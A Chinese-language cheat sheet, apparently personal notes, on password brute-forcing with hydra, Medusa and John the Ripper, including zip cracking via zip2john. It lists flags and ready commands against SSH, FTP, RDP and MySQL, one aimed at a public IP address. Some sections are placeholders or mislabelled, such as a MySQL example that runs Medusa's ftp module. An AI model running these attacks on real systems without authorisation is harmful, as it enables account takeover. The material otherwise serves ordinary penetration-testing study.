暴力破解工具使用汇总

1.查看密码加密方式

在线网站:https://cmd5.com/http://www.158566.com/https://encode.chahuo.com/
kali:hash-identifier

2.hydra

用于各种服务的账号密码爆破:FTP/Mysql/SSH/RDP...常用参数-l name指定破解登录用户名-L name.txt使用文件指定多个用户名-p PASS指定密码-P pass.txt指定密码字典-f / -F找到用户名/密码后中止破解,-f:每个主机,-F:所有-s PORT指定默认端口-e nsrn:空密码试探,s:使用指定用户和密码试探hydra -R继续上一次爆破

2.1.爆破SSH

hydra -L name.txt -P pass.txt ssh://192.168.214.153hydra -l root -P top3000.txt -s 19576 ssh://154.209.111.133 //指定端口为19576进行爆破

2.2.爆破FTP

hydra -L name.txt -P pass.txt ftp://192.168.214.153

2.3.爆破RDP

hydra -L name.txt -P pass.txt rdp://192.168.214.153

2.4.爆破Mysql

hydra -l root -P top3000.txt -e nsr 127.0.0.1 mysql

3.超级弱口令爆破工具

图形化工具

4.Medusa

常用参数参数含义-h目标主机名称或是IP地址-H包含目标主机名称或是IP地址的文件绝对路径-u测试用户名-U包含测试用户名的文件绝对路径-p测试用户名密码-P包含测试用户名密码的文件绝对路径-C组合条目文件的绝对路径-O日志信息文件的绝对路径-e[n/s/ns]n代表空密码,s代表为密码与用户名相同-M模块执行mingc-m传递参数到模块-d显示所有模块名称-n使用非默认TCP端口-s启用ssl-r重试时间,默认3秒-t设定线程数量-T同时测试的主机总数-f在任何主机上找到第一个账号/密码后,停止破解-F在任何主机上找到第一个有效的用户名/密码后停止审计-Z恢复之前终端的扫描
支持服务medusa -d

medusa -h 192.168.190.149 -U top3000.txt -P top500.txt -n 40 -M ssh -f -t 5 -O ssh.txt 爆破sshmedusa -h 192.168.190.149 -U top3000.txt -P top500.txt -n 40 -M ftp爆破ftpmedusa -h 192.168.190.149 -U top3000.txt -P top500.txt -n 40 -M ftp爆破mysql

5.Burpsuite

dddd

6.John

具体的其他选项可通过john --help查看,这列举常用的几个:1. --single 简单破解模式,也是默认的执行模式,就是根据用户和家目录名进行一些简单的变形猜解2.--incremental 逐个遍历模式,其实跟hashcat的increment模式是一样的,直到尝试完所有可能的组合3.--wordlist 纯字典模式,后面跟上字典的路径即可4.--show 显示已经破解出来的hash及所对应的明文密码5.--users 只破解指定用户的hash,可以是用户名或者对应的uid6.--groups 只破解指定用户组的hash,可以是组名或者对应的gid7.--shells 只破解指定shell的hash,可以用逗号分隔多个shell程序

john --wordlist=pass.txt --user=ww passwd_shadow(hash存放的位置) 基于字典的爆破方式john --single --user=ww passwd_shadow (ww的hash) 基于粗暴简单的爆破模式

7.压缩包暴力破解工具

创建1个压缩包文件并设置密码

7.1使用John爆破压缩包

zip2john name.zip > name.zip.hash 使用zip2john生成压缩文件的hash值john 1.zip.hash --wordlist=/usr/share/wordlists/john.lst

7.2使用ARCHPR进行爆破

图形化